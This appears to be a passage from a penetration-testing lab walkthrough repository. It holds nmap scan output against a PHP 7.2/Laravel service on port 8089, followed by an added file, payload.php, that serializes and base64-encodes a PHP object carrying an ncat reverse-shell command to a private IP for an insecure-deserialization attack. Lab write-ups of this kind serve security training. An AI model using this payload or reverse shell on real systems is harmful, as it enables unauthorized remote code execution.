| pragma: no-cache
| expires: -1
| Set-Cookie: XSRF-TOKEN=eyJpdiI6IlFKTnFvQnJsY2tYRlY3SDlCQmZhXC9nPT0iLCJ2YWx1ZSI6Im5HRzJwM2pDNzN2eDQ5TUc4NVYxbnJ2OVpPRXQ1a1hJZGJ1MGt0NHYxVDdFUFhleUJyWHM3U09qTlJQMnEwem4xOTFnVjJwT2JlczBsQlVtWlRIMEpBPT0iLCJtYWMiOiJiODYzNDBlYTNjMjYzYjIyZGQzNTdiMGQ0OTA2YTBiMzk1OTQ1OTQzODZjOGFmMDkwOTA3Yjk0MmI5OGZlZjE1In0%3D; expires=Fri, 16-Jan-2026 18:37:15 GMT; Max-Age=7200; path=/
| Set-Cookie: laravel_session=eyJpdiI6IjRCcndFZFVVY0QyaFUzUWY4cWs1cVE9PSIsInZhbHVlIjoiN3ErenpYUkJZRXZVMU1HZUpLY2tPNkd5VDk1Q3B4VktQSUhsSnZrYmdpZWMzTUVwWUlxbGJqWnBcL3lTcFg2RFl2RWxZMElxNkQ4ZENcL2VYTkNLUm5DUT09IiwibWFjIjoiYzUzMmJjYzM0MWNiODAyMzljZmMwMTExM2RhNTY4NGMyMTA2NjQ4MTAxZGQ1NDc0ZTE0Nj
| HTTPOptions:
| HTTP/1.0 200 OK
| Date: Fri, 16 Jan 2026 16:37:15 +0000
| Connection: close
| X-Powered-By: PHP/7.2.10
| Allow: GET,HEAD,POST
| Cache-Control: private, must-revalidate
| Date: Fri, 16 Jan 2026 16:37:15 GMT
| Content-Type: text/html; charset=UTF-8
| pragma: no-cache
|_ expires: -1
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8089-TCP:V=7.98%I=7%D=1/16%Time=696A693B%P=aarch64-unknown-linux-gn
SF:u%r(GetRequest,D59,"HTTP/1\.0\x20200\x20OK\r\nDate:\x20Fri,\x2016\x20Ja
SF:n\x202026\x2016:37:15\x20\+0000\r\nConnection:\x20close\r\nX-Powered-By
SF::\x20PHP/7\.2\.10\r\nCache-Control:\x20private,\x20must-revalidate\r\nD
SF:ate:\x20Fri,\x2016\x20Jan\x202026\x2016:37:15\x20GMT\r\nContent-Type:\x
SF:20text/html;\x20charset=UTF-8\r\npragma:\x20no-cache\r\nexpires:\x20-1\
SF:r\nSet-Cookie:\x20XSRF-TOKEN=eyJpdiI6IlFKTnFvQnJsY2tYRlY3SDlCQmZhXC9nPT
SF:0iLCJ2YWx1ZSI6Im5HRzJwM2pDNzN2eDQ5TUc4NVYxbnJ2OVpPRXQ1a1hJZGJ1MGt0NHYxV
SF:DdFUFhleUJyWHM3U09qTlJQMnEwem4xOTFnVjJwT2JlczBsQlVtWlRIMEpBPT0iLCJtYWMi
SF:OiJiODYzNDBlYTNjMjYzYjIyZGQzNTdiMGQ0OTA2YTBiMzk1OTQ1OTQzODZjOGFmMDkwOTA
SF:3Yjk0MmI5OGZlZjE1In0%3D;\x20expires=Fri,\x2016-Jan-2026\x2018:37:15\x20
SF:GMT;\x20Max-Age=7200;\x20path=/\r\nSet-Cookie:\x20laravel_session=eyJpd
SF:iI6IjRCcndFZFVVY0QyaFUzUWY4cWs1cVE9PSIsInZhbHVlIjoiN3ErenpYUkJZRXZVMU1H
SF:ZUpLY2tPNkd5VDk1Q3B4VktQSUhsSnZrYmdpZWMzTUVwWUlxbGJqWnBcL3lTcFg2RFl2RWx
SF:ZMElxNkQ4ZENcL2VYTkNLUm5DUT09IiwibWFjIjoiYzUzMmJjYzM0MWNiODAyMzljZmMwMT
SF:ExM2RhNTY4NGMyMTA2NjQ4MTAxZGQ1NDc0ZTE0Nj")%r(HTTPOptions,112,"HTTP/1\.0
SF:\x20200\x20OK\r\nDate:\x20Fri,\x2016\x20Jan\x202026\x2016:37:15\x20\+00
SF:00\r\nConnection:\x20close\r\nX-Powered-By:\x20PHP/7\.2\.10\r\nAllow:\x
SF:20GET,HEAD,POST\r\nCache-Control:\x20private,\x20must-revalidate\r\nDat
SF:e:\x20Fri,\x2016\x20Jan\x202026\x2016:37:15\x20GMT\r\nContent-Type:\x20
SF:text/html;\x20charset=UTF-8\r\npragma:\x20no-cache\r\nexpires:\x20-1\r\
SF:n\r\n")%r(FourOhFourRequest,6A7,"HTTP/1\.0\x20404\x20Not\x20Found\r\nDa
SF:te:\x20Fri,\x2016\x20Jan\x202026\x2016:37:24\x20\+0000\r\nConnection:\x
SF:20close\r\nX-Powered-By:\x20PHP/7\.2\.10\r\nCache-Control:\x20no-cache,
SF:\x20private\r\ndate:\x20Fri,\x2016\x20Jan\x202026\x2016:37:24\x20GMT\r\
SF:nContent-type:\x20text/html;\x20charset=UTF-8\r\n\r\n<!DOCTYPE\x20html>
SF:\n<html\x20lang=\"en\">\n\x20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x
SF:20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x20
SF:<meta\x20http-equiv=\"X-UA-Compatible\"\x20content=\"IE=edge\">\n\x20\x
SF:20\x20\x20\x20\x20\x20\x20<meta\x20name=\"viewport\"\x20content=\"width
SF:=device-width,\x20initial-scale=1\">\n\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0<title>Page\x20Not\x20Found</title>\n\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0<!--\x20Fonts\x20-->\n\x20\x20\x20\x20\x20\x20\x20\x20<link\x20href=\"
SF:https://fonts\.googleapis\.com/css\?family=Raleway:100,600\"\x20rel=\"s
SF:tylesheet\"\x20type=\"text/css\">\n\n\x20\x20\x20\x20\x20\x20\x20\x20<!
SF:--\x20Styles\x20-->\n\x20\x20\x20\x20\x20\x20\x20\x20<style>\n\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20html,\x20body\x20{\n\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20background-color:\x
SF:20#fff;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20color:\x20#636b6f;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20font-family:\x20'Raleway',\x20sans-serif;\n\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-weight:\x20100;
SF:\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20heigh
SF:t:\x20100vh;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20margin:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 3 hops
TRACEROUTE (using port 8089/tcp)
HOP RTT ADDRESS
1 41.81 ms 192.168.128.1
2 ...
3 43.83 ms 10.81.136.171
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan 16 17:37:33 2026 -- 1 IP address (1 host up) scanned in 29.84 seconds

10
Walkthroughs/InsecureDeserialization/payload.php Normal file
View File

@@ -0,0 +1,10 @@
<?php
class MaliciousUserData {
public $command = 'ncat -nv 192.168.138.181 4444 -e /bin/sh';
}
$maliciousUserData = new MaliciousUserData();
$serializedData = serialize($maliciousUserData);
$base64EncodedData = base64_encode($serializedData);
echo "Base64 Encoded Serialized Data: " . $base64EncodedData;
?>